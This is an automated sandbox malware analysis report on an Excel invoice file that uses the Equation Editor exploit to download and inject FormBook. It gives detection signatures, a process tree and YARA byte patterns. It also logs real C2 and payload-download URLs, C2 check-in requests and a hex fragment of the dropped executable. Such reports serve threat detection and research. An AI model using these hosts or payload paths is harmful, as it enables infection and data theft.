Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DL03327INV.xlsx

Overview

General Information

Sample Name:DL03327INV.xlsx
Analysis ID:626601
MD5:5b4a67ac532a5d8900b815144f0fb845
SHA1:6da306004e084780e9f57f3702a5ec22e72fff6c
SHA256:98fc7157dafde651c3ab515663e3a91f034b49175e2e2495c00576c4b8e9e96d
Tags:VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2776 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2364 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2172 cmdline: "C:\Users\Public\vbc.exe" MD5: DE76EF6A11A63EFC00B0303888BC0B7F)
      • yldnat.exe (PID: 1148 cmdline: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna MD5: BC3C746DB1D3F8A821BBDF17CA023450)
        • yldnat.exe (PID: 2452 cmdline: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna MD5: BC3C746DB1D3F8A821BBDF17CA023450)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wuapp.exe (PID: 1112 cmdline: C:\Windows\SysWOW64\wuapp.exe MD5: C8EBA45CEF271BED6C2F0E1965D229EA)
              • cmd.exe (PID: 2960 cmdline: /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.arjimni.com/nc39/"], "decoy": ["bohicaapparel.com", "chilliesofwoodstock.com", "szcipa.com", "nirmalaswagruhafoods.com", "orbitas.online", "bjvxx.com", "atomvpn.site", "thecanvacoach.com", "thewhitelounge.com", "trwebz.xyz", "yiwanggkm.com", "maggiceden-io.com", "kimyanindelisi.online", "xn--e02b19uo0j.com", "kaola74.top", "klcsales.net", "renacerdevteam.com", "talkmoor.com", "seobusinesslistings.com", "contractornurd.com", "wolksquit.com", "hamiltonspringfield.com", "skinclash.com", "d-web.net", "tige03.xyz", "thereeldecoy.com", "dutyapparel.com", "vicentedotorarquitectos.com", "bensdrywall.com", "domainnetwoks.com", "incorrectbenevolence.com", "ramvadher.space", "dbluvt.xyz", "laps-clicks.com", "thewattelectric.com", "fogpromo.com", "ibcfitting.com", "get25000today.com", "do-hobbies-indoors.com", "marmagdistribuciones.com", "newworldtongpaihotels.net", "3astratford.com", "tocarrythemessage.com", "57shasha.club", "117colgett.com", "captainnoclue.com", "rapejesus.site", "grandas-svoboda.com", "apartmentpermis.com", "greatco.biz", "joneswoodworks.com", "lilatoons.com", "banalto.com", "caycilargida.online", "gangez.com", "tw-life.net", "treasuresofjudaica.com", "monin.one", "earthdefense.global", "troolygood.com", "eafc.tech", "southcarolinawire.xyz", "designstatussupport.com", "moorblaque.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8bb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x162e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15d91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x163e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1655f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x995a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1500c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa6d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b947:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x187c9:$sqlite3step: 68 34 1C 7B E1
    • 0x188dc:$sqlite3step: 68 34 1C 7B E1
    • 0x187f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1891d:$sqlite3text: 68 38 2A 90 C5
    • 0x1880b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18933:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8bb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x162e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15d91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x163e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1655f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x995a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1500c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa6d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b947:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.0.yldnat.exe.400000.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.0.yldnat.exe.400000.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8bb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x162e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15d91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x163e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1655f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x995a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1500c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa6d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b947:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ca4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.yldnat.exe.400000.9.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x187c9:$sqlite3step: 68 34 1C 7B E1
        • 0x188dc:$sqlite3step: 68 34 1C 7B E1
        • 0x187f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1891d:$sqlite3text: 68 38 2A 90 C5
        • 0x1880b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18933:$sqlite3blob: 68 53 D8 7F 8C
        6.2.yldnat.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.yldnat.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7db8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8142:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x154e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14f91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x155e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1575f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8b5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1420c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x98d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab47:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 20 entries

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.33.31, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2364, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2364, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          Snort Signatures

          Timestamp:192.168.2.22198.54.117.21249175802031412 05/14/22-15:20:54.628198
          SID:2031412
          Source Port:49175
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22198.54.117.21249175802031453 05/14/22-15:20:54.628198
          SID:2031453
          Source Port:49175
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22198.54.117.21249175802031449 05/14/22-15:20:54.628198
          SID:2031449
          Source Port:49175
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.arjimni.com/nc39/"], "decoy": ["bohicaapparel.com", "chilliesofwoodstock.com", "szcipa.com", "nirmalaswagruhafoods.com", "orbitas.online", "bjvxx.com", "atomvpn.site", "thecanvacoach.com", "thewhitelounge.com", "trwebz.xyz", "yiwanggkm.com", "maggiceden-io.com", "kimyanindelisi.online", "xn--e02b19uo0j.com", "kaola74.top", "klcsales.net", "renacerdevteam.com", "talkmoor.com", "seobusinesslistings.com", "contractornurd.com", "wolksquit.com", "hamiltonspringfield.com", "skinclash.com", "d-web.net", "tige03.xyz", "thereeldecoy.com", "dutyapparel.com", "vicentedotorarquitectos.com", "bensdrywall.com", "domainnetwoks.com", "incorrectbenevolence.com", "ramvadher.space", "dbluvt.xyz", "laps-clicks.com", "thewattelectric.com", "fogpromo.com", "ibcfitting.com", "get25000today.com", "do-hobbies-indoors.com", "marmagdistribuciones.com", "newworldtongpaihotels.net", "3astratford.com", "tocarrythemessage.com", "57shasha.club", "117colgett.com", "captainnoclue.com", "rapejesus.site", "grandas-svoboda.com", "apartmentpermis.com", "greatco.biz", "joneswoodworks.com", "lilatoons.com", "banalto.com", "caycilargida.online", "gangez.com", "tw-life.net", "treasuresofjudaica.com", "monin.one", "earthdefense.global", "troolygood.com", "eafc.tech", "southcarolinawire.xyz", "designstatussupport.com", "moorblaque.com"]}
          Multi AV Scanner detection for submitted file
          Source: DL03327INV.xlsxVirustotal: Detection: 38%Perma Link
          Source: DL03327INV.xlsxReversingLabs: Detection: 26%
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.arjimni.com/nc39/Avira URL Cloud: Label: malware
          Source: http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwhAvira URL Cloud: Label: malware
          Source: http://104.168.33.31/75/vbc.exeAvira URL Cloud: Label: malware
          Source: http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwhAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 51%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 51%
          Machine Learning detection for dropped file
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 6.2.yldnat.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.yldnat.exe.120000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.3.EQNEDT32.EXE.6af7ba.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 6.0.yldnat.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.yldnat.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.yldnat.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.168.33.31 Port: 80Jump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
          Source: Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B

          Software Vulnerabilities

          barindex
          Shellcode detected
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D04FF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D052D ShellExecuteW,ExitProcess,2_2_036D052D
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D0494 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D0494
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D03EF ExitProcess,2_2_036D03EF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D0552 ExitProcess,2_2_036D0552
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D04AE URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D04AE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D0424 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D0424
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D0408 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D0408
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D0518 ShellExecuteW,ExitProcess,2_2_036D0518
          Source: global trafficDNS query: name: www.arjimni.com
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 23.81.214.26 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.arjimni.com
          Source: C:\Windows\explorer.exeDomain query: www.tw-life.net
          Source: C:\Windows\explorer.exeDomain query: www.contractornurd.com
          Source: C:\Windows\explorer.exeDomain query: www.yiwanggkm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 164.155.217.57 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.arjimni.com/nc39/
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SEA-10US LEASEWEB-USA-SEA-10US
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.212 198.54.117.212
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:19:31 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Fri, 13 May 2022 09:36:08 GMTETag: "4065c-5dee1677234a5"Accept-Ranges: bytesContent-Length: 263772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 